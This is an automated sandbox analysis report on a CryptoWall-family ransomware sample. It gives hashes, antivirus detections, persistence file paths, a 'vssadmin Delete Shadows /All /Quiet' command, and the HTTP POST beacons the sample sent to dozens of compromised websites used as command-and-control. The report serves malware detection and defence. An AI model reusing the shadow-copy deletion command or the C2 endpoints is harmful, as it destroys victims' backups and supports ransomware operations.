Analysis Date2015-10-11 13:54:50
MD57504279e2add1641ece6b780a0ce9919
SHA1bd0c3ca94278b0024b58393ead39a0ae032fb5c7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 30c918fbbc946cce2179909ea65a89fd sha1: e4bdc696ff9db0e989e1f618b1e72ae753ef4d16 size: 39424
Section.rdata md5: 1e30a24ddc54a64de3d5f30b0a27bdbc sha1: d0d1cda9d9aec336ba0a2d716468eacdfd12b859 size: 9216
Section.data md5: c08b4ee71d8aab6ba3537609d89a94bd sha1: 37970bd87c2188049e2918de8b1eba19918499d6 size: 4096
Section.fggd md5: 63a3ff14c18817e837bd4e98abb3ea7f sha1: 2d65c046ef7e4a9ea412cd01cd689411265e10ed size: 86528
Section.hgse md5: 139910683aaf26252378123e6d249021 sha1: d272efe6f89d154d66af9b8a58a64040dc825049 size: 5632
Section.rsrc md5: ff5306cce9f67a0150db41493ef5290d sha1: 5c375e6351f1e89f967c78a59fe6653bb263e7a6 size: 1024
Section.reloc md5: 15f2bc9cc00d5328ec08e1a4192f5f3d sha1: d6ad71c2622ba004eb92f335834c4222e8e62fc4 size: 4096
Timestamp2015-09-20 10:45:07
VersionCompanyName: serdjgheru
PackerMicrosoft Visual C++ ?.?
PEhash23c1e4ae288c3af17034c0170516ef28cbe0f2c8
IMPhash9a0b622db4d13d8c51c2434b257a0f4b
AVRisingno_virus
AVMcafeeGamarue-FCX!7504279E2ADD
AVAvira (antivir)TR/Crypt.Xpack.280574
AVTwisterno_virus
AVAd-AwareGen:Variant.Mikey.24858
AVAlwil (avast)no_virus
AVEset (nod32)Win32/Kryptik.DXSG
AVGrisoft (avg)Crypt4.CLDF
AVSymantecno_virus
AVFortinetW32/Generic.AC.2879014
AVBitDefenderGen:Variant.Mikey.24858
AVK7Trojan ( 004cf8d21 )
AVMicrosoft Security EssentialsRansom:Win32/Crowti!rfn
AVMicroWorld (escan)Gen:Variant.Mikey.24858
AVMalwareBytesRansom.CryptoWall
AVAuthentiumW32/S-177bdd36!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusVirus.Win32.Cryptor
AVEmsisoftGen:Variant.Mikey.24858
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroRansom_.0A217DD0
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVPadvishTrojan.Win32.FakeSysDef.OE
AVBullGuardGen:Variant.Mikey.24858
AVArcabit (arcavir)Gen:Variant.Mikey.24858
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Mikey.24858
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSslaughtertime.com
Winsock DNSmisja52.com
Winsock DNSleicesterholmeproject.co.uk
Winsock DNSevolvingcareers.co.uk
Winsock DNShechtelshobbycenter.be
Winsock DNSreynelgonzalez.com
Winsock DNSfundmymission.org
Winsock DNSeshraqatee.com
Winsock DNSveloelectric.com.au
Winsock DNSzeitcreative.com
Winsock DNSsabeehah.com
Winsock DNShhydrovac.ca
Winsock DNSfan-out.com
Winsock DNSmineralesdelsur.com
Winsock DNScurlmyip.com
Winsock DNSdeicapelli.it
Winsock DNSintellicus.com
Winsock DNSfoundersomaha.net
Winsock DNSfabconcepts.net
Winsock DNSgeopowercables.com
Winsock DNSmyexternalip.com
Winsock DNSgoodtalk.info
Winsock DNSftpsecurityservices.com
Winsock DNSkoerper-modellage.de
Winsock DNSlinkcorphk.com
Winsock DNSip-addr.es
Winsock DNSspoilrotn.com
Winsock DNSmedicalmarijuanamiamiflorida.com
Winsock DNSewineco.com
Winsock DNSexternalbatterycase.com
Winsock DNSespecializaciondigital.com
Winsock DNSbuonatale.com
Winsock DNShurt911morrow.com
Winsock DNSmonarchestatemanagement.com
Winsock DNSmedulaosea.net
Winsock DNSgeorgiainjurycenters.com
Winsock DNSsnakebid.com
Winsock DNShagginhosp.com
Winsock DNSsmkcpaky.com
Winsock DNSheadline365.com
Winsock DNSchicanoymenarguez.com
Winsock DNSgreenevap.com
Winsock DNSroyalworldtours.in
Winsock DNStruereno.com
Winsock DNSfoxycalendargirls.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSewineco.com
Type: A
192.186.235.6
DNSslaughtertime.com
Type: A
173.234.209.98
DNSlinkcorphk.com
Type: A
188.121.47.1
DNSintellicus.com
Type: A
216.38.129.210
DNSespecializaciondigital.com
Type: A
192.254.233.175
DNShechtelshobbycenter.be
Type: A
62.182.61.62
DNSgoodtalk.info
Type: A
128.140.220.8
DNSsabeehah.com
Type: A
188.121.47.1
DNSevolvingcareers.co.uk
Type: A
188.121.47.1
DNSgeorgiainjurycenters.com
Type: A
184.168.19.1
DNShurt911morrow.com
Type: A
184.168.19.1
DNSleicesterholmeproject.co.uk
Type: A
188.121.47.1
DNSeshraqatee.com
Type: A
107.180.4.26
DNSchicanoymenarguez.com
Type: A
185.14.56.94
DNShagginhosp.com
Type: A
184.168.26.1
DNSroyalworldtours.in
Type: A
192.232.219.235
DNSmineralesdelsur.com
Type: A
192.254.233.175
DNSexternalbatterycase.com
Type: A
192.186.222.229
DNStruereno.com
Type: A
69.163.208.246
DNShhydrovac.ca
Type: A
107.180.44.135
DNSkoerper-modellage.de
Type: A
87.106.167.110
DNSgeopowercables.com
Type: A
107.180.44.125
DNSgreenevap.com
Type: A
50.63.95.1
DNSveloelectric.com.au
Type: A
106.187.103.246
DNSheadline365.com
Type: A
173.234.209.98
DNSfoxycalendargirls.com
Type: A
192.254.186.154
DNSmonarchestatemanagement.com
Type: A
72.167.131.9
DNSbuonatale.com
Type: A
80.88.88.152
DNSftpsecurityservices.com
Type: A
107.180.26.90
DNSfan-out.com
Type: A
50.62.245.1
DNSfabconcepts.net
Type: A
107.180.4.133
DNSmisja52.com
Type: A
178.255.42.139
DNSdeicapelli.it
Type: A
62.149.226.198
DNSsmkcpaky.com
Type: A
50.62.69.1
DNSspoilrotn.com
Type: A
184.168.19.1
DNSmedicalmarijuanamiamiflorida.com
Type: A
50.62.104.1
DNSfoundersomaha.net
Type: A
50.63.42.1
DNSzeitcreative.com
Type: A
192.185.48.135
DNSsnakebid.com
Type: A
69.197.163.146
DNSfundmymission.org
Type: A
184.168.221.44
DNSreynelgonzalez.com
Type: A
192.254.233.175
DNSmedulaosea.net
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?e=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?k=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://linkcorphk.com/js-js/5.php?w=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?b=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?h=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?s=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?r=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sabeehah.com/images/Image/2.php?a=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?r=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?j=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hurt911morrow.com/wp-content/uploads/2013/12/2.php?q=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://leicesterholmeproject.co.uk/js-js/1.php?s=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?o=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?f=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?g=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://royalworldtours.in/js/2.php?j=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/2.php?o=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?v=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?u=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?n=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?j=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/3.php?l=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?f=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?u=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?h=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?b=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?e=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://monarchestatemanagement.com/m/images/1.php?b=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buonatale.com/ilario_bordoni/assets/images/1.php?y=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?f=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?g=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?m=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?o=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?a=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://smkcpaky.com/pdf/3.php?o=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://spoilrotn.com/4.php?j=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://medicalmarijuanamiamiflorida.com/4.php?g=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?z=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://zeitcreative.com/cgi-bin/3.php?k=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?b=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?a=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?e=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://reynelgonzalez.com/compras/image/data/1.php?e=scbr49gz3uf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?c=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?e=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://linkcorphk.com/js-js/5.php?n=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?d=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?d=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?n=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?o=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sabeehah.com/images/Image/2.php?h=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?j=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?f=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hurt911morrow.com/wp-content/uploads/2013/12/2.php?e=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://leicesterholmeproject.co.uk/js-js/1.php?u=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?m=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?u=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?s=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://royalworldtours.in/js/2.php?i=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/2.php?c=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?s=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?k=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?n=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?h=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mineralesdelsur.com/wp-includes/js/jcrop/3.php?i=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?c=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?p=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?o=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?k=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?j=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://monarchestatemanagement.com/m/images/1.php?k=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buonatale.com/ilario_bordoni/assets/images/1.php?c=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?g=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?r=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?u=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?t=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?x=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://smkcpaky.com/pdf/3.php?b=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://spoilrotn.com/4.php?x=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://medicalmarijuanamiamiflorida.com/4.php?p=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?a=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://zeitcreative.com/cgi-bin/3.php?a=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?f=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?s=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?u=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://reynelgonzalez.com/compras/image/data/1.php?c=u6da3d26yzj
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1035 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1036 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1037 ➝ 216.38.129.210:80
Flows TCP192.168.1.1:1038 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1039 ➝ 62.182.61.62:80
Flows TCP192.168.1.1:1040 ➝ 128.140.220.8:80
Flows TCP192.168.1.1:1041 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1042 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1043 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1044 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1045 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1046 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1047 ➝ 185.14.56.94:80
Flows TCP192.168.1.1:1048 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1049 ➝ 192.232.219.235:80
Flows TCP192.168.1.1:1050 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1051 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1052 ➝ 69.163.208.246:80
Flows TCP192.168.1.1:1053 ➝ 107.180.44.135:80
Flows TCP192.168.1.1:1054 ➝ 87.106.167.110:80
Flows TCP192.168.1.1:1055 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1056 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1057 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1058 ➝ 106.187.103.246:80
Flows TCP192.168.1.1:1059 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1060 ➝ 192.254.186.154:80
Flows TCP192.168.1.1:1061 ➝ 72.167.131.9:80
Flows TCP192.168.1.1:1062 ➝ 80.88.88.152:80
